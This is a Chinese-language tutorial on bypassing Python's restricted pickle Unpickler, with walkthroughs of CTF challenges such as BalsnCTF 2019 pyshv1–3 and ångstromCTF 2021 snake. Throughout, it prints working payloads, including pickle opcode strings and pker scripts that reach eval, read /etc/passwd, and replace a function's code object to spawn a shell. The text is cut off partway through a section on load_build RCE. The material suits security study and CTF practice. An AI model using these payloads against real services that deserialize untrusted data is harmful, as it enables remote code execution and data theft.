Pickle 反序列化绕过

 

绕过 Restricted Unpickler

pickle.Unpickler 简介

pickle.Unpickler 类是 Python 中用于反序列化对象的核心类之一。提供了一种将序列化的数据转换回原始 Python 对象的机制。以下是 Unpickler 类的一些重要特点和功能:

  1. 反序列化:Unpickler 类用于从序列化的数据中还原原始的 Python 对象。接收一个可读的文件对象或者包含序列化数据的字节流作为输入。

  2. 定制化:Unpickler 类可以通过继承并重写一些方法来实现自定义的反序列化逻辑。例如,可以重写 find_class 方法以自定义类的查找过程,或者重写 load 方法以修改反序列化的行为。

  3. 安全性:Unpickler 类对反序列化的数据进行了一定的安全性处理,以防止可能的恶意攻击。它限制了可以被反序列化的类和模块,并提供了一些选项来控制反序列化的安全级别。

  4. 扩展性:Unpickler 类支持注册外部的对象工厂,以便在反序列化时生成自定义对象。通过调用 register_factory 方法,可以将一个工厂函数与一个特定的类型关联起来,当遇到该类型时,Unpickler 将使用工厂函数创建对象。

使用 pickle.Unpickler 类进行反序列化的基本步骤如下:

  1. 创建一个 Unpickler 实例,传入可读的文件对象或者字节流作为参数。

  2. 调用 load 方法开始反序列化过程。该方法会读取序列化数据,并将其转换为 Python 对象。

官方示例如下:

import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

restricted_loads(pickle.dumps([1, 2, range(15)]))

官方的示例中使用了一个 safe_builtins 白名单来限制可以反序列化的类。在尝试反序列化时, RestrictedUnpickler 会调用 find_class 进行过滤。

find_class

参考 pickle反序列化初探 - 先知社区,绕过 find_class 有两个关键点:

  1. 当出现c、i、b'\x93'时,会调用,所以只要在这三个 opcode 直接引入模块时没有违反规则即可。
  2. find_class()只会在解析 opcode 时调用一次,所以只要绕过 opcode 执行过程,find_class() 就不会再调用,也就是说 find_class() 只需要过一次,通过之后再产生的函数在黑名单中也不会拦截,所以可以通过__import__绕过一些黑名单。

绕过黑名单

寻找未被限制的利用链

Code-Breaking picklecode 给出了一个黑名单的场景

源码如下:

import pickle
import io
import builtins

__all__ = ('PickleSerializer', )


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


class PickleSerializer():
    def dumps(self, obj):
        return pickle.dumps(obj)

    def loads(self, data):
        try:
            if isinstance(data, str):
                raise TypeError("Can't load pickle from unicode string")
            file = io.BytesIO(data)
            return RestrictedUnpickler(file,
                              encoding='ASCII', errors='strict').load()
        except Exception as e:
            return {}

这道题将 eval,exec 等关键词进行了过滤。

{'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

意味着无法直接通过 cbuiltins\neval 这种方式来获取 eval 函数,对应到 python 源码,即不能通过下面的方式进行获取:

__import__('builtins').eval

绕过这样的限制,就需要不使用点号运算符来获取 eval 函数,自然就可以想到 getattr, __getattribute__ 等函数。

getattr(__builtins__,'eval')
__builtins__.__getattribute__('eval')

两种构造差异,第二种构造较为简单

c = b'''cbuiltins
__getattribute__
(S'eval'
tR.
'''

print(pickle.loads(c))
# <built-in function eval>

在 find_class 看来,这段 payload 仅导入了 builtins.__getattribute__ eval,只是一个字符串,因此可以绕过获取到 eval 函数。

c = b'''cbuiltins
__getattribute__
(S'eval'
tR(S'__import__("os").system("ls")'
tR.
'''

第一种绕过的方式较为复杂,需要经过如下的几个步骤:

  1. 第一步:获取 getattr 函数。这一步的 pickle 可以写为
    c = b'''cbuiltins
    getattr
    .
    
  2. 由于 pickle 不能仅仅只导入一个模块,因此无法直接获取 builtins 模块。 也就是说还需要换一种方式获取 __builtins__, 例如使用 gloabls() 函数。
    getattr(globals()['__builtins__'],'eval')
    

    这样一来,第二步需要获取 globals 函数并执行,这一步的 pickle 可以写为

    c = b'''cbuiltins
    globals
    (tR.
    '''
    
  3. 由于 pickle 不支持字典索引,因此需要通过 dict 的 get 函数来获取 globals()['__builtins__'] 于是 payload 需要再进行变换。
    getattr(dict.get(globals(),'__builtins__'),'eval')
    

    第三步是需要获取 dict.get 函数。当然,这里的导入层数为 3,c 操作码只能够导入 2 层,因此这里需要用到前面的 getattr 函数,也就是通过 getattr(dict,'get') 的方式获取 get 函数

    c = b'''cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR.
    '''
    
  4. 获取到 get 函数后,就可以从 globals() 获取 __builtins__
    c = b'''cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR(cbuiltins
    globals
    (tRS'__builtins__'
    tR.
    '''
    # <module 'builtins' (built-in)>
    
  5. 获取到 __builtins__ 后,就可以通过 getattr(__builtins__,'eval') 获取 eval 函数,由于 getattr 被复用了,我们可以是用 g 操作码进行存储,到第二次使用时使用 p 操作码进行获取. 下面的 payload 中,获取到 getattr 后使用 p0 存储到 memo_0,获取到 __builtins__ 后使用 p1 存储到 memo_1. 调用时先使用 g1 获取 getattr 函数,然后使用 g1 获取 __builtins__。获取到 eval 后再压入 python 代码,最后执行 ls
     c = b'''cbuiltins
     getattr
     p0
     (cbuiltins
     dict
     S'get'
     tR(cbuiltins
     globals
     (tRS'__builtins__'
     tRp1
     g0
     (g1
     S'eval'
     tR(S'__import__("os").system("ls")'
     tR.
     '''
    

使用 pker 生成 payload: 第一种 payload

getattr = GLOBAL('builtins','getattr')
dict = GLOBAL('builtins','dict')
dict_get = getattr(dict,'get')
globals_dict = GLOBAL('builtins','globals')()
builtins = dict_get(globals_dict,'__builtins__')
eval = getattr(builtins,'eval')
return eval('__import__("os").system("ls")')

第二种 payload

return GLOBAL('builtins','__getattribute__')('eval')('__import__("os").system("ls")')

绕过白名单

利用不安全的白名单

BalsnCTF 2019 Pyshv1 中使用了白名单进行限制。

# securePickle.py
import pickle, io

whitelist = []

# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)

def loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

dumps = pickle.dumps

# server.py
pickle.whitelist.append('sys')

securePickle.py 中声明了一个 whitelist, server.py 中将 sys 模块添加到白名单中,sys 模块本身并不安全,也同样可以使用 sys.modules['os'] 的方式找到 os 模块,进而执行命令。

属性创建与函数劫持

BalsnCTF 2019 Pyshv2 中白名单只有一个 structs 模块。与 BalsnCTF 2019 Pyshv1 不同的是,BalsnCTF 2019 Pyshv1 中使用了 pickle.Unpickler.find_class(self, module, name) 去寻找类,而这道题中使用的是 __import__ 和 getattr 去获取。

# securePickle.py
import pickle
import io


whitelist = []

# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        module = __import__(module)
        return getattr(module, name)


def loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()


dumps = pickle.dumps

# server.py
pickle.whitelist.append('structs')

structs 模块是题目给出的 structs.py,其内容为空。对于 python 中导入的模块,都以通过获取其 __builtins__ 属性来获取 builtins 模块对应的字典,获取到这个字典之后,再获取 eval 函数就可以执行任意 python 代码了。目标是构造如下的代码:

structs.__builtins__['eval']

由于需要从字典中取值,因此也需要用到 get 函数,由于这里获取到的 __builtins__ 只是一个字典,因此获取 get 函数需要通过 __builtins__['dict'].get 去获取,再次需要通过字典去索引,这就会陷入死循环。

这道题的解法十分巧妙,使用了一种函数劫持的方式。注意到白名单校验之后会通过 __import__ 函数去导入模块,然后使用 getattr 获取属性。

        module = __import__(module)
        return getattr(module, name)

假如我们要通过 getattr(module, name) 获取到 get 函数,就需要 module 的值为 __buitlins__ 字典,name 为 get. 则上一步 module = __import__(module) 需要获取到 __buitlins__ 字典。但 module 的值仅能为 structs,因此正常情况下无法获取。

但 pickle 在反序列化时是可以进行全局覆盖的,如果将 __import__ 覆盖成 __getattribute__, 则在执行 module = __import__(module) 时,相当于执行:

module = __getattribute__('structs')

此时会获取 structs 模块的 structs 属性。因此这里需要将 structs.structs 赋值为 __buitlins__ 字典。但由于 structs.structs 从未声明过,因此不可以直接使用 GLOBAL('structs', 'structs')这样的形式进行获取,而是需要创建这个成员变量。

python 中获取成员变量通常使用 . 运算符,这个运算符实际上会去查询这个类的 __dict__属性,__dict__属性是一个包含了所有成员变量的字典。因此除了使用 . 运算符赋值来创建成员变量以外,还可以直接向 __dict__ 属性中添加键值对来添加成员变量。

structs.aaa = "bbb"
structs.__dict__['aaa'] = "bbb"

>>> structs.__dict__['aaa'] = "bbb"
>>> structs.aaa
'bbb'

所以,想要将 structs.structs 赋值为 __builtins__ 需要如下的步骤:

__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
__dict__['structs'] = builtins

接着是覆盖 __import____getattribute__, 然后获取 get 函数。

gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
builtin_get = GLOBAL('structs', 'get')

获取到 get 函数之后,就可以从 __buitlins__ 字典获取 eval 函数了。最终 exp 为:

__dict__ = GLOBAL('structs', '__dict__')
builtins = GLOBAL('structs', '__builtins__')
gtat = GLOBAL('structs', '__getattribute__')
builtins['__import__'] = gtat
__dict__['structs'] = builtins
builtin_get = GLOBAL('structs', 'get')
eval = builtin_get('eval')
eval('print(open("/etc/passwd").read())')
return

注意:这里已经将 __import__ 函数进行了覆盖,因此不能再使用 eval('__import__("os").system("ls")') 来执行系统命令,但是可以使用 open 函数来读取文件内容。

如果在重载的 find_class 中直接调用 pickle.Unpickler.find_class 方法, 这种覆盖 __import__ 函数的 payload 会引发提前引发异常导致无法执行到最后的 eval 函数中, 反而无法利用.因此函数劫持这种方式需要具体问题具体分析.

方法创建

假设 structs.py 中存在一个类:

class User(object):
    def __init__(self, name, group):
        self.name = name
        self.group = group
        self.isadmin = 0
        self.prompt = ''

正常实例化这样一个 User 类得到的对象中是不会有 __call__ 方法的.

>>> a = structs.User('aaa','bbb')
>>> a.__call__
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'User' object has no attribute '__call__'

但是通过反序列化之后是可以为其添加上这个方法, 下面是 pker 脚本, 脚本中将 __call__ 方法设定为构造函数.

User = GLOBAL('structs', 'User')
User.name = 'aaa'
User.group = 'bbb'
User.__call__ = User
return User

运行后就可以看到这个方法可以被正常调用.

>>> a = pickle.loads(b"cstructs\nUser\np0\n0g0\n(}(S'name'\nS'aaa'\ndtbg0\n(}(S'group'\nS'bbb'\ndtbg0\n(}(S'__call__'\ng0\ndtbg0\n.")
>>> a.__call__
<class 'structs.User'>
>>> a.__call__()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: __init__() missing 2 required positional arguments: 'name' and 'group'

其实方法创建与属性创建是一样的, 方法也仅仅是类中的一个属性. 在某些情况下, 创建特定的成员函数会改变类的处理过程, 例如 python 中的描述符.

描述符(descriptor)是一种用于控制属性访问的特殊对象。实现了 __get____set____delete__ 方法的类可以称为一个描述符, 这三个方法分别控制对属性的读取、赋值和删除操作。

描述符对象可以被用作类的属性,当对该属性进行访问时,Python 解释器会调用描述符对象的相应方法来完成属性操作。

描述符主要有三种类型:

  1. 数据描述符(Data Descriptor):实现了 __get____set__ 方法的描述符对象。它可以控制对属性的读取和赋值操作。
  2. 非数据描述符(Non-Data Descriptor):只实现了 __get__ 方法的描述符对象。只能控制对属性的读取操作,无法进行赋值操作。

  3. 简单描述符(Simple Descriptor):只实现了 __get__ 方法或 __set__ 方法的描述符对象。不能同时控制对属性的读取和赋值操作。

下面是一个示例:

class Descriptor:
    def __get__(self, instance, owner):
        print("Getting the value")
        return instance._value

    def __set__(self, instance, value):
        print("Setting the value")
        instance._value = value

class MyClass:
    attribute = Descriptor()

obj = MyClass()

# 对属性进行赋值
obj.attribute = 10

# 对属性进行访问
print(obj.attribute)

在这个示例中,Descriptor 描述符类实现了 __get____set__ 方法。MyClass 类中的 attribute 属性是一个描述符对象。当对 attribute 属性进行赋值和访问时,会自动调用 Descriptor 类的相应方法,从而控制属性的操作。

描述符对象的应用范围广泛,例如可以用于属性的延迟加载、类型检查、数据验证等场景.

BalsnCTF_2019 pyshv3 这道题就是利用创建 __set__ 来将一个类转化为描述符.

securePickle.py 文件内容与 pyshv1 一致, server.py 中仅仅将 structs 模块添加到了白名单中.

# File: securePickle.py
import pickle
import io


whitelist = []

# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)


def loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()


dumps = pickle.dumps



# File: server.py
import securePickle as pickle
import codecs
import os


pickle.whitelist.append('structs')


class Pysh(object):
    def __init__(self):
        self.key = os.urandom(100)
        self.login()
        self.cmds = {
            'help': self.cmd_help,
            'whoami': self.cmd_whoami,
            'su': self.cmd_su,
            'flag': self.cmd_flag,
        }

    def login(self):
        with open('../flag.txt', 'rb') as f:
            flag = f.read()
        flag = bytes(a ^ b for a, b in zip(self.key, flag))
        user = input().encode('ascii')
        user = codecs.decode(user, 'base64')
        user = pickle.loads(user)
        print('Login as ' + user.name + ' - ' + user.group)
        user.privileged = False
        user.flag = flag
        self.user = user

    def run(self):
        while True:
            req = input('$ ')
            func = self.cmds.get(req, None)
            if func is None:
                print('pysh: ' + req + ': command not found')
            else:
                func()

    def cmd_help(self):
        print('Available commands: ' + ' '.join(self.cmds.keys()))

    def cmd_whoami(self):
        print(self.user.name, self.user.group)

    def cmd_su(self):
        print("Not Implemented QAQ")
        # self.user.privileged = 1

    def cmd_flag(self):
        if not self.user.privileged:
            print('flag: Permission denied')
        else:
            print(bytes(a ^ b for a, b in zip(self.user.flag, self.key)))


if __name__ == '__main__':
    pysh = Pysh()
    pysh.run()

    
# File: structs.py
class User(object):
    def __init__(self, name, group):
        self.name = name
        self.group = group
        self.isadmin = 0
        self.prompt = ''

获取 flag 的方法是执行 login 函数然后执行 cmd_flag 函数, 但输出 flag 前会验证 user.privileged, pickle 反序列化后会将 user.privileged 赋值为 False, 也就是说这里即使利用反序列化修改了 user.privileged 的值,也会重新赋值为 False.

结合前面的描述符的知识点, 如果我们将 user.privileged 设置为一个描述符对象, 那么就可以改变 user.privileged = False 的结果.

由于我们可以控制 User 类, 所以只要将其添加一个 __set__ 方法, 就可以将 User 类转化为一个描述器.

payload 如下:

User = GLOBAL('structs', 'User')
User.__set__ = User
user = User("aaa", "bbb")
User.privileged = user
return user

注意:

  1. 给 privileged 赋值的需要是一个描述器实例.
  2. 题目会接收反序列化的返回值为一个对象,因此实例化的对象需要进行返回

利用代码对象篡改函数

python 中利用代码对象 RCE 这种利用手法通常出现在 pyjail 中,因为需要能够输入 python 代码并执行。其利用方式有两种:

  1. 创建一个新的代码对象,然后执行
  2. 或者覆盖现有函数的 __code__ 属性,利用代码本身的执行流程执行。

在 python 反序列化的场景下,由于只能够创建、修改对象,无法控制对象的执行,因此第一种方式行不通,只能通过第二种方式。

下面是一个测试。

def read():
    return print(open("/etc/passwd",'r').read())

def readTest():
    return print(open("/flag",'r').read())

function_type = type(lambda: None)
code_type = type((lambda: None).__code__)

code = read.__code__

argcount = code.co_argcount
posonlyargcount = code.co_posonlyargcount
kwonlyargcount = code.co_kwonlyargcount
nlocals = code.co_nlocals
stacksize = code.co_stacksize
flags = code.co_flags
codestring = code.co_code
constants = code.co_consts
names = code.co_names
varnames = code.co_varnames
filename = code.co_filename
name = code.co_name
qualname = code.co_qualname
firstlineno = code.co_firstlineno
linetable = code.co_linetable
exceptiontable = code.co_exceptiontable
freevars = code.co_freevars
cellvars = code.co_cellvars


mydict = {}
mydict['__builtins__'] = __builtins__

codeobj = code_type(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, qualname, firstlineno, linetable, exceptiontable, freevars, cellvars)
# code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, qualname, firstlineno, linetable, exceptiontable, freevars=(), cellvars=(),/)

# function_type(codeobj, mydict, None, None, None)()
# eval(codeobj)
readTest.__code__ = codeobj
readTest()

将 readTest 的__code__ 属性进行修改后,执行 readTest 函数就会执行我们的 payload。

ångstromCTF 2021 snake 这道题就是利用这种攻击手法。题目利用 find_class 限制了导入模块时, module 只能够为 __main__,name 只能够以 Snake 开头, 最多索引两层,并且 name 的长度小于 20。

题目完整源码如下, 可以看到 __main__ 中以 Snake 开头且长度小于 20 的只有 SnakeSave 和 SnakeWindow。

#!/usr/bin/python3 -SIEs

import curses
import random
import base64
import pickle
import io

class SnakeSave:
	def __init__(self, highScores, game=None):
		self.highScores = highScores
		self.game = game

	class HighScores:
		def __init__(self, player):
			self.player = player
			self.scores = []

		def getHighScore(self, score):
			return max(self.scores+[score])

	class Game:
		def __init__(self, width, height, coords):
			self.width = width
			self.height = height
			self.coords = coords
			self.direction = curses.KEY_RIGHT
			self.score = 0
			self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))
			while self.food in self.coords: self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))

		def move(self):
			self.coords.append((
				self.coords[-1][0] + (1 if self.direction == curses.KEY_DOWN else -1 if self.direction == curses.KEY_UP else 0),
				self.coords[-1][1] + (1 if self.direction == curses.KEY_RIGHT else -1 if self.direction == curses.KEY_LEFT else 0)
			))
			if self.coords[-1][0] > 18 or self.coords[-1][1] > 58 or \
			   self.coords[-1][0] < 1 or self.coords[-1][1] < 1 or \
			   self.coords.index(self.coords[-1]) != len(self.coords) - 1: return False
			if self.food == self.coords[-1]:
				self.score += 1
				while self.food in self.coords: self.food = (random.randint(1, self.height-2), random.randint(1, self.width-2))
				return None
			else:
				erase = self.coords[0]
				self.coords = self.coords[1:]
				return erase

class SnakeRestrictedUnpickler(pickle.Unpickler):
	def find_class(self, module, name):
		if module == "__main__" and name.startswith("Snake") and name.count(".") <= 1 and len(name) <= len("SnakeSave.HighScores"):
			return super().find_class(module, name)
		raise pickle.UnpicklingError(f"HACKING DETECTED")

def SnakeWindow(_):
	curses.curs_set(0)
	win = curses.newwin(20, 60, 0, 0)
	win.border(0)
	win.keypad(1)
	win.timeout(100)
	win.addch(game.food[0], game.food[1], '*')
	for coord in game.coords: win.addch(coord[0], coord[1], '#')
	while True:
		win.addstr(0, 2, f"{highScores.player}'s Score: {game.score:05d}")
		win.addstr(0, 41, f"High Score: {highScores.getHighScore(game.score):05d}")
		key = win.getch()
		if key == 27: return True
		if key in (curses.KEY_LEFT, curses.KEY_RIGHT, curses.KEY_DOWN, curses.KEY_UP): game.direction = key
		erase = game.move()
		if erase == False: return
		elif erase: win.addch(erase[0], erase[1], ' ')
		else: win.addch(game.food[0], game.food[1], '*')
		win.addch(game.coords[-1][0], game.coords[-1][1], '#')

print('Welcome to snake! Eat as many pickles as you can. Hit a wall or yourself and you die. Press escape to resume later.')
if input('Do you have a restore code? [y/n] ')[0].lower() == 'y':
	snake = SnakeRestrictedUnpickler(io.BytesIO(base64.b64decode(input('Restore code: ')))).load()
	print(snake)
	highScores = snake.highScores
	if snake.game: game = snake.game
	else: game = SnakeSave.Game(60, 20, [(12, 12), (12, 13), (12, 14)])
else:
	highScores = SnakeSave.HighScores(input('Enter your name: '))
	game = SnakeSave.Game(60, 20, [(12, 12), (12, 13), (12, 14)])
left = curses.wrapper(SnakeWindow)
if left:
	print(f"Enter the following code to resume your game later: {base64.b64encode(pickle.dumps(SnakeSave(highScores, game))).decode('ascii')}")
else:
	highScores.scores.append(game.score)
	print(f"You ate {game.score} pickles!")
	print(f"{highScores.player}'s Top 10 Scores:")
	for num, score in enumerate(sorted(highScores.scores, reverse=True)):
		print(f"{num+1}. {score}")
		if num > 9: break
	print(f"Restore your data with the following code: {base64.b64encode(pickle.dumps(SnakeSave(highScores))).decode('ascii')}")

因此这里的目标是修改 SnakeWindow 函数。

第一步:修改函数的 __code__ 属性

一般情况下,修改成员变量可以使用 DICT 和 BUILD 指令,也就是 db 操作码。

p = PROTO + b'\x04' + \
    GLOBAL + b'__main__\nSnakeWindow\n' + \
    MARK + \
        UNICODE + b'__code__\n' + \
        UNICODE + b'cccc\n' + \
        b'db' + \
    STOP

但这段代码只会在 SnakeWindow 实例的 __dict__ 属性中添加一个键值对, 并不会将真正的 __code__ 属性进行覆盖。

>>>a = loads(p)
>>>a.__code__
<code object SnakeWindow at 0x2f90790, file "/mnt/share/project/ctf_archives/test/python_sec/pickle/ångstromCTF 20214/snake/test.py", line 54>
>>>a.__dict__
{'__code__': 'bbbb'}

BUILD 的行为在 pickle 源代码中的 load_build 函数中定义:

    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build

由于 code 类并没有 __setstate__ 函数,因此不会调用 setstate 函数。

如果 state 不为 False 或者 None 的话,就会进入 __dict__ 的处理流程,得到的就是上面的结果,无法覆盖正常的 __code__ 属性。

因此我们需要让 state 的判断为 None 或者 False。state 来源于上一个判断中 state 的第一个元素。

if isinstance(state, tuple) and len(state) == 2:
    state, slotstate = state

又因为进入下面的赋值时,我们需要 k 和 v 分别为 __code__ 和要篡改的值。

if slotstate:
    for k, v in slotstate.items():
        setattr(inst, k, v)

所以我们可以将 state 赋值为:

(None,{'__code__',xxxxx})

综上所述,为了调用 setattr 来覆盖真正的 __code__ 属性,我们需要在栈上压入:

  1. SnakeWindow
  2. (None,{'__code__',xxxxx}) 两个元素,然后执行 BUILD 操作码。

因此 payload 可以改为:

p = GLOBAL + b'__main__\nSnakeWindow\n' + \
    NONE + \
    MARK + \
        UNICODE + b'__code__\n' + \
        UNICODE + b'bbbb\n' + \
        DICT + \
    TUPLE2 + \
    BUILD + \
    STOP

由于这里赋值 __code__ 时没有传入 code 对象,因此报错是正常的。后面只要构造出 code 对象,将其进行替换即可。这一段 payload 可以作为一个 gadget。

a = loads(p)
Traceback (most recent call last):
  File "<string>", line 1, in <module>
TypeError: __code__ must be set to a code object

第二步:构建 code 对象

我们可以编写 payload 函数,并打印所有 __code__ 子属性。

def read(_):
    return __import__('os').system('reset;sh')

print(read.__code__.co_argcount)
print(read.__code__.co_posonlyargcount)
print(read.__code__.co_kwonlyargcount)
print(read.__code__.co_nlocals)
print(read.__code__.co_stacksize)
print(read.__code__.co_flags)
print(read.__code__.co_code)
print(read.__code__.co_consts)
print(read.__code__.co_names)
print(read.__code__.co_varnames)
print(read.__code__.co_filename)
print(read.__code__.co_name)
print(read.__code__.co_qualname)
print(read.__code__.co_firstlineno)
print(read.__code__.co_linetable)
print(read.__code__.co_exceptiontable)
print(read.__code__.co_freevars)
print(read.__code__.co_cellvars)

可以得到:

1
0
0
1
3
3
b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00'
(None, 'os', 'reset;sh')
('__import__', 'system')
('_',)
/mnt/share/project/ctf_archives/test/python_sec/pickle/test.py
read
read
3
b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.'
b''
()
()

正常情况下,可以通过 __code__.__class__ 获取到 CodeType(pickle 协议 < 4 时不允许索引多层), PROTO 指定协议版本为 4

p = PROTO + b'\x04' + \
    GLOBAL + b'__main__\nSnakeWindow.__code__.__class__\n' + \
    STOP
print(loads(p))
# <class 'code'>

但这道题限制了只能索引一层。因此需要通过获取 type 函数,由于类的 __class__ 属性就是 type 函数,我们可以通过 SnakeSave.__class__ 获取 type 函数.

SnakeSave.__class__(SnakeWindow.__code__.__class__)
# <class 'type'>
```属性
上述的代码转化为 pickle 后如下
```py属性
        GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
        GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
        TUPLE1 + REDUCE + \

获取到 CodeType 就可以传入参数并执行了:

p = PROTO + b'\x04' + \
        GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
        GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
        TUPLE1 + REDUCE + \
            MARK + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x03' + \
                BININT1 + b'\x03' + \
                SHORT_BINBYTES + b'\x46' + b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00' + \
                NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \
                UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \
                UNICODE + b'_\n' + TUPLE1 + \
                UNICODE + b'solve.py\n' + \
                UNICODE + b'read\n' + \
                UNICODE + b'read\n' + \
                BININT1 + b'\x03' + \
                SHORT_BINBYTES + b'\x1e' + b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.' + \
                SHORT_BINBYTES + b'\x00' + \
                EMPTY_TUPLE + \
                EMPTY_TUPLE + \
            TUPLE + \
        REDUCE + \
    STOP

print(loads(p))
# <code object read at 0x7f7af9301730, file "solve.py", line 3>

这里需要注意的有两点:

  1. SHORT_BINBYTES 第一个字节为长度。
  2. 倒数第三个属性 co_exceptiontable 为空,不能直接传入 SHORT_BINBYTES + b'' + \,应该传入 SHORT_BINBYTES + b'\x00' + \

获取到代码对象之后,将其替换到第一步的 payload 中,最终 payload 如下:

p = PROTO + b'\x04' + \
    GLOBAL + b'__main__\nSnakeWindow\n' + \
    NONE + \
    MARK + \
        UNICODE + b'__code__\n' + \
        GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
        GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
        TUPLE1 + REDUCE + \
            MARK + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x03' + \
                BININT1 + b'\x03' + \
                SHORT_BINBYTES + b'\x46' + b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00S\x00' + \
                NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \
                UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \
                UNICODE + b'xd\n' + TUPLE1 + \
                UNICODE + b'solve.py\n' + \
                UNICODE + b'read\n' + \
                UNICODE + b'read\n' + \
                BININT1 + b'\x03' + \
                SHORT_BINBYTES + b'\x1e' + b'\x80\x00\xdd\x0b\x15\x90d\xd1\x0b\x1b\xd4\x0b\x1b\xd7\x0b"\xd2\x0b"\xa0:\xd1\x0b.\xd4\x0b.\xd0\x04.' + \
                SHORT_BINBYTES + b'\x01' + \
                EMPTY_TUPLE + \
                EMPTY_TUPLE + \
            TUPLE + \
        REDUCE + \
        DICT + \
    TUPLE2 + \
    BUILD + \
    STOP	

print(loads(p))
SnakeWindow("")

再次执行 SnakeWindow 函数时会进入 sh。

由于 pker 没有实现二进制字符串,因此 pker 没法直接构造。

利用 load_build RCE

pickle load_build 函数对应的是 BUILD 操作码的行为,用于完成对象属性的赋值,但 load_build 在一定条件下可以执行任意方法,且参数可控,从而导致任意命令执行。由于最终的函数调用是通过 pickle 自身的代码来完成的,因此我们的 payload 中不会出现 R 字符。

下面是这种攻击方式的原理:

BUILD 指令对应 pickle 源代码中的 load_build 函数。

    def load_build(self):
        stack = self.stack
        state = stack.pop()
